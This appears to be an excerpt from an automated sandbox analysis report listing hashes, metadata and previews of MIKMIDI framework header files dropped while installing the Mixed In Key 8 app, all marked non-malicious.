                                                                                                    SHA-512:EC4FA99D4E6B0B8388AA6BAE1831CF411EF98C11459382773F72E6BE5754F1BD65A0B0E375375B250CAD66D7B5C2407E55B42D5B8E67306F1C12789F97BC1AA4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPolyphonicKeyPressureEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A polyphonic key pressure (aftertouch) event.. *. * This event most often represents pressing down on a key after it "bottoms out".. */.@interface MIKMIDIPolyphonicKeyPressureEvent : MIKMIDIChannelEvent../**. * The MIDI note number for the event.. */.@property (nonatomic, readonly) UInt8 note;../**. * The pressure of the event. From 0-127.. */.@property (nonatomic, readonly) UInt8 pressure;..@end../**. * The mutable counter part of MIKMIDIPolyphonicKeyPressureEvent. */.@interface MIKMutableMIDIPolyphonicKeyPressureEvent : MIKMIDIPolyphonicKeyPressureEvent..@property (nonatomic, readwrite) UInt8 note;.@property (nonatomic, readwrite) UInt8 pressure;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_TAm0X4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1041
                                                                                                    Entropy (8bit):5.079225811007229
                                                                                                    Encrypted:false
                                                                                                    MD5:70BFB0AF7CD64A5AD41596B29027FE87
                                                                                                    SHA1:3568B5B05E20D630A5C8BC9DAC45F3E157C9A1BC
                                                                                                    SHA-256:CC13C4E9F9104EA8E506BBB5BE682709CEB1DC0510A30086CDA4753F17541BA0
                                                                                                    SHA-512:3DE3F475DF1F7154968FF4DAF636C239E5018549CD72B48A779DF2B0277B0EA3CFF45D70B51FF3ABFD3EE955626BBC551B54515B77D36D74D115BE13805A787A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIProgramChangeCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 1/14/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI program change message.. *. * Program change messages indicate a change in the patch number.. * These messages can be sent to to a MIDI device or synthesizer to. *.change the instrument the instrument/voice being used to synthesize MIDI.. */.@interface MIKMIDIProgramChangeCommand : MIKMIDIChannelVoiceCommand../**. * The program (aka patch) number. From 0-127.. */.@property (nonatomic, readonly) NSUInteger programNumber;..@end../**. * The mutable counterpart of MIKMIDIProgramChangeCommand. */.@interface MIKMutableMIDIProgramChangeCommand : MIKMIDIProgramChangeCommand..@property (nonatomic, readwrite) UInt8 channel;.@property (nonatomic, readwrite) NSUInteger value;..@property (nonatomic, readwrite) NSUInteger pr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_TeQHmE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):6434
                                                                                                    Entropy (8bit):4.8664082520558845
                                                                                                    Encrypted:false
                                                                                                    MD5:E9C1189C947302CA15DFFCC20252416E
                                                                                                    SHA1:AD484F95BBAE7B0C15FA6565CE1B67CE037BA267
                                                                                                    SHA-256:5FC2515A168E5D3D894BC4718A47F169AF099558A29885BD4C899B95EBDC0A74
                                                                                                    SHA-512:924BA96E9E1B8C79282577E6F5E6257103DB5880FD5DA4342C8DA1F612AFE8341015774836BB100A8B67B34532A74C2A92B268F8EE22B358BB69309146431390
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMappableResponder.h.// MIKMIDI.//.// Created by Andrew Madsen on 5/20/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDIResponder.h".#import "MIKMIDICompilerCompatibility.h"../**. * Bit-mask constants used to specify MIDI responder types for mapping.. * Multiple responder types can be specified by ORing them together.. * @see -[MIKMIDIMappableResponder MIDIResponderTypeForCommandIdentifier:]. */.typedef NS_OPTIONS(NSUInteger, MIKMIDIResponderType){../**.. * Responder does not have a type. Cannot be mapped... */..MIKMIDIResponderTypeNone = 0,..../**.. * Type for a MIDI responder that can handle messages from a hardware absolute.. * knob or slider. That is, one that sends control change messages with an absolute value.. * depending on its position... */..MIKMIDIResponderTypeAbsoluteSliderOrKnob = 1 << 0,..../**.. * Type for a MIDI responder that can handle messages from a hardware relative.. * knob
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_U1TEbw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):2468
                                                                                                    Entropy (8bit):5.03894920776458
                                                                                                    Encrypted:false
                                                                                                    MD5:B65C485747B8C10983E6A34768A2B0AF
                                                                                                    SHA1:21BB4EDDFB3C6755BAD801050B6F3934643A742C
                                                                                                    SHA-256:DE6DE355AB7893A34BA9F9FD410B6D7F85A5F2DD1F4A4E05295004B48C5A6814
                                                                                                    SHA-512:0A6F23517628343B7502EA5EE617BD0031AED24DC55B6FDCF8ECAE9A68C3A4BB9CF8AEBB2398FA87D48A0C47533EDB16AF7767699A42CD53984B1AA3949B4BDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPlayer.h.// MIKMIDI.//.// Created by Chris Flesner on 9/8/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISequence;.@class MIKMIDIMetronome;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIPlayer can be used to play an MIKMIDISequence.. */.__attribute((deprecated("use MIKMIDISequencer instead"))).@interface MIKMIDIPlayer : NSObject../**. * Prepares the MusicPlayer for playback.. *. * Call this method in advance of playback to reduce a music player...s startup latency.. */.- (void)preparePlayback;../**. * Starts playback from the beginning of the music sequence. . * Equivalent to calling -startPlaybackFromPosition with a position of 0.. */.- (void)startPlayback;../**. * Starts playback of the music sequence from the specified position.. *. * @param position The MusicTimeStamp to begin playback from.. */.- (void)startPlaybackFrom
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_U38Jvm
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):4217
                                                                                                    Entropy (8bit):5.067261939431002
                                                                                                    Encrypted:false
                                                                                                    MD5:C3B9963A7845D7AA5017CF9BE9EBA508
                                                                                                    SHA1:A9E36EC2E411F6350D51947D7CB6A1E60183921D
                                                                                                    SHA-256:65511548B999025AEA8396C973F7926196A5E450D8F89EC717DF47827C884479
                                                                                                    SHA-512:EB9A4136370943ECB41191A76DE8B945E9BEC634382E3809718B0EAD06BACDE32CA0455E84B8185FA8CFE2C3B96D5DE1ECB59E0F4EAA034AC4A03570A7AEA27B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIUtilities.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDIMappableResponder.h".#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h".#include <mach/mach_time.h>..NS_ASSUME_NONNULL_BEGIN..NSString * _Nullable MIKStringPropertyFromMIDIObject(MIDIObjectRef object, CFStringRef propertyID, NSError *__autoreleasing*error);.BOOL MIKSetStringPropertyOnMIDIObject(MIDIObjectRef object, CFStringRef propertyID, NSString *string, NSError *__autoreleasing*error);..SInt32 MIKIntegerPropertyFromMIDIObject(MIDIObjectRef object, CFStringRef propertyID, NSError *__autoreleasing*error);.BOOL MIKSetIntegerPropertyFromMIDIObject(MIDIObjectRef object, CFStringRef propertyID, SInt32 integerValue, NSError *__autoreleasing*error);..MIDIObjectType MIKMIDIObjectTypeOfObject(MIDIObjectRef object, NSError *__autoreleasing*error);..NSS
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_UtxeO6
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):761
                                                                                                    Entropy (8bit):5.12711187949223
                                                                                                    Encrypted:false
                                                                                                    MD5:33F4A38707F2A08CD655754653B6D9E0
                                                                                                    SHA1:9EF2DA1B345EB98B277BF358D7C1610B13E9F81B
                                                                                                    SHA-256:E2FF4B77AEBDA5C0557EAAC73CCFB17E8C5647D4456C18993D76A04561B6B34D
                                                                                                    SHA-512:7697C8C60DB0185A0BF73FEB68EAAC6A8A2D32A52788ADFBC04D853F4A8CA3AF1B62947AE328BB55FD504AB65CC1D50B4EFBA6BDA30D7BD7128C0C19744909D2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaCopyrightEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing copyright information.. */.@interface MIKMIDIMetaCopyrightEvent : MIKMIDIMetaTextEvent..@end../**. * The mutable counterpart of MIKMIDIMetaCopyrightEvent.. */.@interface MIKMutableMIDIMetaCopyrightEvent : MIKMIDIMetaCopyrightEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_VmDRRr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):726
                                                                                                    Entropy (8bit):5.1279292269280266
                                                                                                    Encrypted:false
                                                                                                    MD5:57845F2556DEFBE69E3E313E403F9BB1
                                                                                                    SHA1:D3A7D5A800E7F8A9883BD748EF735E5272C51234
                                                                                                    SHA-256:46384AE5AFAF4F4FAFD2DEEEB09CC4BCBA48D680ED57F700F05771475CFA376C
                                                                                                    SHA-512:4A82B63B98F6D04A64B79830964F40708A8DC7D2F675F68262A750A229C8CC0417385925238B120E799FABB86B532EB813AC354FD46FB109CB5553A94B9E0C0A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaLyricEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing lyrics.. */.@interface MIKMIDIMetaLyricEvent : MIKMIDIMetaTextEvent..@end../**. * The mutable counterpart of MIKMIDIMetaLyricEvent.. */.@interface MIKMutableMIDIMetaLyricEvent : MIKMIDIMetaLyricEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_WVgpyo
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1770
                                                                                                    Entropy (8bit):4.851084757038362
                                                                                                    Encrypted:false
                                                                                                    MD5:B8A38DA039F2388CF6C4FDF1DB2B7F91
                                                                                                    SHA1:7F6274EF9A77D91B29E6D7F8DFF126CFD89C8D9F
                                                                                                    SHA-256:C18F7F5E0A45DA623BA2FC50E8F7D5E034C0E0B6AED2512399E3B084DCF2C4C2
                                                                                                    SHA-512:A8C5E109C6510C7BA300EDDDF0FBFEC5F5C0B1C3F7F8F9C62692386FF9F8E228BD37EAC88100FF7C8F28A353841F22A5E9BB750439DEE2ADD26BEB0EC30645F9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIClientSourceEndpoint.h.// MIKMIDI.// .// Created by Dan Rosenstark on 2015-01-07.//..#import "MIKMIDISourceEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../**. *.MIKMIDIClientSourceEndpoint represents a virtual endpoint created by your application to send MIDI. *.to other applications on the system.. *. * Instances of this class will be visible and can be connected to by other applications.. */.@interface MIKMIDIClientSourceEndpoint : MIKMIDISourceEndpoint../**. * Initializes a new virtual source endpoint.. *. * This is essentially equivalent to creating a Core MIDI source endpoint. * using MIDISourceCreate(). Source endpoints created using this. * method can be used by your application to *send* MIDI rather than receive. * it. They can be seen and connected to by other applications on the system.. *. * @param name.A name for the new virtual endpoint.. *. * @return An instance of MIKMIDIClientSourceEndpoint
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_WqH7JK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):11025
                                                                                                    Entropy (8bit):4.9298049027249204
                                                                                                    Encrypted:false
                                                                                                    MD5:1645CDF444D66F9DAA8DD3C076B80282
                                                                                                    SHA1:41F1D30DB988BD0AF411C73C3B8D39F2AB2380C8
                                                                                                    SHA-256:268F8ED3CC71FAA93EF81BB8338709686410DA25A3DD689AB2434C84B3C6F8BD
                                                                                                    SHA-512:E55E952BCCCDC6977CB31A9853C9C2CFD4C505B1617ED9A16C5B89A780DC5A4BE20E96ED00D9CB4BABEE6BFBEF16910C660C2ECB54ED579F2C4500A3A03A9C76
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDICommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDICompilerCompatibility.h"../**. * Types of MIDI messages. These values correspond directly to the MIDI command type values. * found in MIDI message data.. *. * @note Not all of these MIDI message types are currently explicitly supported by MIKMIDI.. */.typedef NS_ENUM(NSUInteger, MIKMIDICommandType) {../** Note off command. */..MIKMIDICommandTypeNoteOff = 0x8f,../** Note on command. */..MIKMIDICommandTypeNoteOn = 0x9f,../** Polyphonic key pressure command. */..MIKMIDICommandTypePolyphonicKeyPressure = 0xaf,../** Control change command. This is the most common command sent by MIDI controllers. */..MIKMIDICommandTypeControlChange = 0xbf,../** Program change command. */..MIKMIDICommandTypeProgramChange = 0xcf,../** Channel pressure command. */..MIKMIDICommand
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_X8EHkm
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2528
                                                                                                    Entropy (8bit):4.883260419804713
                                                                                                    Encrypted:false
                                                                                                    MD5:22D88676254FAF28DF6CE54D21947C6C
                                                                                                    SHA1:48AF424C9A5A52A1E20D5B2034868347E598B8D0
                                                                                                    SHA-256:379127A2A59992FF715B21FDE95CAAA83F7DEF2856391E65A39EB86244DD43BB
                                                                                                    SHA-512:D3C14C7E5ADE3ED9B6A7E32B100F20FDDE11B8B904F8C22AF27996C0F27735BC167935DF745DC89AE38583B71C7C16C14C785049E877E0CABE99655BB8BD3056
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEntity.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIDevice;.@class MIKMIDIEndpoint;.@class MIKMIDISourceEndpoint;.@class MIKMIDIDestinationEndpoint;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIEntity represents a logical grouping of endpoints within a MIDI device. It essentially. * acts as a simple container for endpoints.. *. * As part of MIKMIDIDevice's support for wrapping virtual endpoints, an MIKMIDIEntity can also. * be created using virtual MIDI endpoints.. */.@interface MIKMIDIEntity : MIKMIDIObject../**. * Convenience method for creating a "virtual" MIKMIDIEntity instance from one or more virtual endpoints.. * This method is typically not called directly by clients of MIKMIDI. Rather it's used by MIKMIDIDevice's. * internal machinery for creating virtual devices.. *. * @param endpoints An array of one
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_YG9Vy6
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):3546
                                                                                                    Entropy (8bit):4.9195115639416676
                                                                                                    Encrypted:false
                                                                                                    MD5:BAAA4C91E1BF91A2D3C8B1622210C76E
                                                                                                    SHA1:63866F1E6277B42866BF131768496EB07B438F63
                                                                                                    SHA-256:254C196E943065F867B5DCEA0601246CE52911A9ED96208C2147E883F6A706B2
                                                                                                    SHA-512:29E2F07852CF3968303234FF6B7A985BE954579B3953B61C500BB8C73BAE8BC4E29F5A81FBF380470280E17CE11E1819469D3B101261934F1FD04AD223A9FB31
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIObject.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIObject is the base class for all of MIKMIDI's Objective-C wrapper classes for CoreMIDI classes.. * It corresponds to MIDIObject in CoreMIDI.. *. * MIKMIDIObject is essentially an "abstract" base class, although it does implement several methods common. * to all MIDI objects.. */.@interface MIKMIDIObject : NSObject../**. * Convenience method for creating a new MIKMIDIObject instance. Returns an instance of a. * concrete subclass of MIKMIDIObject (e.g. MIKMIDIDevice, MIKMIDIEntity, . * MIKMIDISource/DestinationEndpoint) depending on the type of the object passed into it.. *. * @param objectRef A CoreMIDI MIDIObjectRef.. *. * @return An instance of the appropriate subclass of MIKMIDIObject.. */.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_bplGE4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):8401
                                                                                                    Entropy (8bit):5.034324563697656
                                                                                                    Encrypted:false
                                                                                                    MD5:0D3ECDB4B71F50E25AB116C48E61D33B
                                                                                                    SHA1:558DEB0B669F550267ABDC4860C9949CA0C2A45F
                                                                                                    SHA-256:D5D371DEF3381F91405D6144833AAFA8B088D568523CE0C5039AEF9B3A63F13B
                                                                                                    SHA-512:B33C6A759C504B52E6825EF1789DFD3C60930222B857C06F58872B422E7FB39EF26B1A306FF4577636A321161A33D0C108A6AAC687DC7260B3F36EBFFD53888D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"../**. * Types of MIDI events. These values are used to determine which subclass to. * instantiate when creating a new MIDI event.. *. * @note These are similar, but do not directly correspond to the values of MusicEventType. */.typedef NS_ENUM(NSUInteger, MIKMIDIEventType).{. MIKMIDIEventTypeNULL = kMusicEventType_NULL,..MIKMIDIEventTypeExtendedNote = kMusicEventType_ExtendedNote,..MIKMIDIEventTypeExtendedTempo = kMusicEventType_ExtendedTempo,..MIKMIDIEventTypeUser = kMusicEventType_User,..MIKMIDIEventTypeMeta = kMusicEventType_Meta, /* See subtypes below */..MIKMIDIEventTypeMIDINoteMessage = kMusicEventType_MIDINoteMessage,..MIKMIDIEventTypeMIDIChannelMessage = kMusicEventType_MIDIChannelMessage, /* See subtypes below
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cOdoeU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):12475
                                                                                                    Entropy (8bit):4.902941372946482
                                                                                                    Encrypted:false
                                                                                                    MD5:C99E988A57F0C26376DB82DCD0C89469
                                                                                                    SHA1:72B51C41440BBB3DF8D412B0C9B97BE7ACC763F5
                                                                                                    SHA-256:00C363DC5C78D8D8C52C7524A653CD40598EAD9D3D2F93922669EDEEB6330C40
                                                                                                    SHA-512:B19FA3823E046E33CFD2EA65620B51183B348CF42A70F0A3E7B13C00631319D232A855C5C103CDCEA8DD3811D422F8ED812E2E6774D0BA1CDC5A612686D7B20A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDITrack.h.// MIDI Files Testbed.//.// Created by Andrew Madsen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISequence;.@class MIKMIDIEvent;.@class MIKMIDINoteEvent;.@class MIKMIDIDestinationEndpoint;..NS_ASSUME_NONNULL_BEGIN../**. * Instances of MIKMIDITrack contain sequences of MIDI events. Commonly,. * these will be MIDI notes. Multiple MIKMIDITracks can be contained in a. * MIKMIDISequence, which can be played.. * . * @see MIKMIDISequence. */.@interface MIKMIDITrack : NSObject../**. * Inserts the specified MIDI event into the receiver.. *. * @param event The MIDI event to insert into the track.. */.- (void)addEvent:(MIKMIDIEvent *)event;../**. * Inserts the specified MIDI events into the receiver.. *. * @param events An NSArray containing the events to be added.. */.- (void)addEvents:(MIKArrayOf(MIKMIDIEve
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cd1jxC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):6151
                                                                                                    Entropy (8bit):4.900118130815014
                                                                                                    Encrypted:false
                                                                                                    MD5:212500E85B211D2165EA7E547A86F01A
                                                                                                    SHA1:A9D010885D03421E7F7CCD8A97C69F0BAE64CD57
                                                                                                    SHA-256:70B8194DF998B6AA472B59A96E8992D87AF6B04ADA0358374DC55FEDCA087654
                                                                                                    SHA-512:E80976922510115C2686B4E43C77E49D3E75D53052EAB89FEDA03A8F83B004BD74242ED71DFE29C79BFC3F0A14539751B340C15BEBD51CF070B8B4B5FD68D40F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIControlChangeCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI control change message.. */.@interface MIKMIDIControlChangeCommand : MIKMIDIChannelVoiceCommand../**. Convenience method for creating a standard control change command instance. Can only be used to create a standard 7-bit command... @param controllerNumber The MIDI control number for the command.. @param sevenBitValue The controlValue of the command. Only the lower 7 bits of this are used.. @return An initialized MIKMIDIControlChangeCommand instance.. */.+ (instancetype)controlChangeCommandWithControllerNumber:(NSUInteger)controllerNumber value:(NSUInteger)sevenBitValue;../**. Convenience method for creating a 14-bit control change command instance.. . @param controllerNumber The MIDI control number for the co
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_dIA0Py
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1636
                                                                                                    Entropy (8bit):4.87609895474185
                                                                                                    Encrypted:false
                                                                                                    MD5:5FCF9092A4857837FAC14D3987B42E8C
                                                                                                    SHA1:E6318343C45AF056CAA0EB027880F0A2D4AE7F39
                                                                                                    SHA-256:550BDFF1BFA34DC72147E0A466B89361508C8583B66058F55417FFD035B1769A
                                                                                                    SHA-512:AF1BA3554B4C6236B5B0642787BDC4236D2A4F8CD0320AB18C368468436FAA92398FFF9E152F64403D494DCA652EAAA91ED9A7005E10A0BD3D12AFB6D6934110
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIDestinationEndpoint.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIEndpoint.h".#import "MIKMIDICommandScheduler.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIDestinationEndpoint represents a source (input) MIDI endpoint.. * It is essentially an Objective-C wrapper for instances of CoreMIDI's MIDIEndpoint class. * which are kMIDIObjectType_Destination type endpoints.. *. * MIDI destination endpoints are contained by MIDI entities, which are in turn contained by MIDI devices.. * MIDI messages can be outputed through a destination endpoint using MIKMIDIDeviceManager's. * -sendCommands:toEndpoint:error: method.. *. * Note that MIKMIDIDestinationEndpoint does not declare any methods of its own. All its methods can be. * found on its superclasses: MIKMIDIEndpoint and MIKMIDIObject. Also, MIKMIDIDestinationEndpoint itself. * is only used to
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_fb7ypo
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1528
                                                                                                    Entropy (8bit):5.033647047822556
                                                                                                    Encrypted:false
                                                                                                    MD5:FDAE5C06FD8DA2CE3C45F35A4B2FEE2B
                                                                                                    SHA1:4AD3B752925B88549266841884E78328FB475660
